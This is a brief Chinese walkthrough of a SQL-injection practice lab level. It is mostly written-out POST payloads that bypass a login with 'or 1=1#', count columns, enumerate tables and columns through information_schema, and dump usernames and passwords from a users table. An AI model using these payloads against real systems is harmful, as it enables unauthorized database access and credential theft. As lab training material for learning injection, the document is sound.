题目:POST - Error Based - Single quotes- String
在post data 里输入 uname=pppp 'or 1=1#&passwd=1&submit=Submit
uname=pppp 'or 1=1 order by 3#&passwd=1&submit=Submit
uname=pppp 'or 1=1 order by 2#&passwd=1&submit=Submit
uname=pppp 'and 1=1 union select 1,2#&passwd=1&submit=Submit
uname=pppp 'and 1=1 union select database(),version()#&passwd=1&submit=Submit
uname=pppp 'and 1=1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#&passwd=1&submit=Submit
表名:emails,referers,uagents,users
uname=pppp 'and 1=1 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#&passwd=1&submit=Submit
列名:USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password,level,id,username,password
uname=pppp 'and 1=1 union select username,password from users limit 0,1#&passwd=1&submit=Submit
uname=pppp 'and 1=1 union select username,password from users limit 1,1#&passwd=1&submit=Submit